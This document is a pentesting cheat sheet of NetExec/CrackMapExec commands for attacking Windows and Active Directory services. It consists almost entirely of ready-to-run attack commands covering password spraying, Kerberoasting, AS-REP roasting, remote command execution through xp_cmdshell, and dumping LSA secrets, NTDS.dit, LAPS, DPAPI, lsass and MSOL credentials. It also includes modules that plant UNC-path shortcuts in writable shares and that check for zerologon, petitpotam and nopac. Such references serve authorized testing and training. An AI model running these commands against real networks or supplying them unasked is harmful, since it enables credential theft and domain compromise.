A cheat sheet for NetExec and CrackMapExec, featuring useful commands and modules for different services to use during Pentesting
Enumeration
Initial Enumeration
Null Authentication
1
| netexec smb target -u '' -p ''
|
Guest Authentication
1
| netexec smb target -u 'guest' -p ''
|
List Shares
1
| netexec smb target -u '' -p '' --shares
|
1
| netexec smb target -u username -p password --shares
|
List Usernames
1
| netexec smb target -u '' -p '' --users
|
1
| netexec smb target -u '' -p '' --rid-brute
|
1
| netexec smb target -u username -p password --users
|
Local Authentication
1
| netexec smb target -u username -p password --local-auth
|
Using Kerberos
1
| netexec smb target -u username -p password -k
|
Check for hosts that have SMB signing disabled
1
| netexec smb target(s) --gen-relay-list relay.txt
|
Spraying
Password Spray
1
| netexec smb target -u users.txt -p password --continue-on-success
|
1
| netexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
|
1
| netexec ssh target -u username -p password --continue-on-success
|
SMB
All In One
1
| netexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
|
Spider_plus Module
1
| netexec smb target -u username -p password -M spider_plus
|
1
| netexec smb target -u username -p password -M spider_plus -o READ_ONLY=false
|
Dump a specific file
1
| netexec smb target -u username -p password -k --get-file target_file output_file --share sharename
|
FTP
List folders and files
1
| netexec ftp target -u username -p password --ls
|
List files inside a folder
1
| netexec ftp target -u username -p password --ls folder_name
|
Retrieve a specific file
1
| netexec ftp target -u username -p password --ls folder_name --get file_name
|
LDAP
Enumerate users using ldap
1
| netexec ldap target -u '' -p '' --users
|
All In One
1
| netexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groups
|
Kerberoast
1
| netexec ldap target -u username -p password --kerberoasting kerb.txt
|
ASREProast
1
| netexec ldap target -u username -p password --asreproast asrep.txt
|
MSSQL
Authentication
1
| netexec mssql target -u username -p password
|
Execute commands using xp_cmdshell
-X for powershell and -x for cmd
1
| netexec mssql target -u username -p password -x command_to_execute
|
Get a file
1
| netexec mssql target -u username -p password --get-file output_file target_file
|
Secrets Dump
Dump LSA secrets
1
| netexec smb target -u username -p password --local-auth --lsa
|
gMSA
1
| netexec ldap target -u username -p password --gmsa-convert-id id
|
1
| netexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account
|
Group Policy Preferences
1
| netexec smb target -u username -p password -M gpp_password
|
Dump LAPS v1 and v2 password
1
| netexec smb target -u username -p password --laps
|
Dump dpapi credentials
1
| netexec smb target -u username -p password --laps --dpapi
|
Dump NTDS.dit
1
| netexec smb target -u username -p password --ntds
|
Bloodhound
1
| netexec ldap target -u username -p password --bloodhound -ns ip --collection All
|
Useful Modules
Webdav
Checks whether the WebClient service is running on the target
1
| netexec smb ip -u username -p password -M webdav
|
Veeam
Extracts credentials from local Veeam SQL Database
1
| netexec smb target -u username -p password -M veeam
|
slinky
Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
1
| netexec smb ip -u username -p password -M slinky
|
ntdsutil
Dump NTDS with ntdsutil
1
| netexec smb ip -u username -p password -M ntdsutil
|
ldap-checker
Checks whether LDAP signing and binding are required and/or enforced
1
| cme ldap target -u username -p password -M ldap-checker
|
Check if the DC is vulnerable to zerologon, petitpotam, nopac
1
| netexec smb target -u username -p password -M zerologon
|
1
| netexec smb target -u username -p password -M petitpotam
|
1
| netexec smb target -u username -p password -M nopac
|
Check the MachineAccountQuota
1
| netexec ldap target -u username -p password -M maq
|
ADCS Enumeration
1
| netexec ldap target -u username -p password -M adcs
|
Dump lsass
1
| netexec smb target -u username -p password -M lsassy
|
Retrieve MSOL account password
1
| netexec smb target -u username -p password -M msol
|
Resources
